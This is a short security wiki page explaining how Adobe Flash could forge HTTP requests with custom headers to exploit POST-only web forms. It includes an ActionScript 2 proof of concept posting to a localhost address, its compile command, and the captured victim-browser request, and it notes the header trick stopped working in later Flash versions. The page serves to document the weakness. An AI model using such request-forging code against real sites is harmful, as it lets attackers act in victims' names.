Arbitrary HTTP Requests

From FlashSec

Jump to: navigation, search

Flash can be used to send arbitrary HTTP Headers to web applications. In attacks it's often use as an easy way to exploit forms which only allow POST requests. With newer versions of Adobe Flash plugin it's not so easy any more to forge the referrer and the original SWF is referenced. There are still possibilities as described by Alex. It's possible to use a construction like req.addRequestHeader("Referer:http://foo/?param=", "bar") to add a custom Referer (but it has some drawbacks). Note: As of Flash Player V 9.0.115 this method of adding custom headers like Referer, Cookie etc. neither works with AS2 nor AS3 based SWF anymore.

Here's an example written in ActionScript 2:

class forge_headers {
  function forge_headers() {
  }

  static function main(mc) {
	var req:LoadVars=new LoadVars();
	req.addRequestHeader("Bar","BarFoo");
	req.decode("a=b&c=d&e=f");
	req.send("http://127.0.0.1:2342/foo","","POST")
  }
}

The ActionScript source can be compiled using MTASC:

mtasc -swf forge_headers.swf -main -header 10:10:10 forge_headers.as

When the resulting SWF is executed in a victims browser (Safari 3.0.2 in this case), this example request is filed:

POST /foo HTTP/1.1
Accept-Language: en
Accept-Encoding: gzip, deflate
Referer: http://localhost/forge_headers.swf
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Content-Type: application/x-www-form-urlencoded
Bar: BarFoo
Content-Length: 11
Connection: keep-alive
Host: 127.0.0.1:2342

e=f&c=d&a=b

[edit] References